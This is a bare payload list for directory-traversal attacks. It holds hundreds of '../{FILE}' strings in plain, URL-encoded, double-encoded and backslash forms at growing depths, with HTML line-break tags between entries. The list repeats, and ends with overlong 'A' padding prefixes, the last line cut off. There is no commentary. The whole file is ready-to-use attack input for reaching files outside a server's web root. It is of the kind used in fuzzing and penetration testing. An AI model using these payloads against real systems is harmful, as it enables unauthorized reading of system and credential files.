../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
\../{FILE}&lt;br /&gt;
\../\../{FILE}&lt;br /&gt;
\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../\../\../{FILE}&lt;br /&gt;
/..\{FILE}&lt;br /&gt;
/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA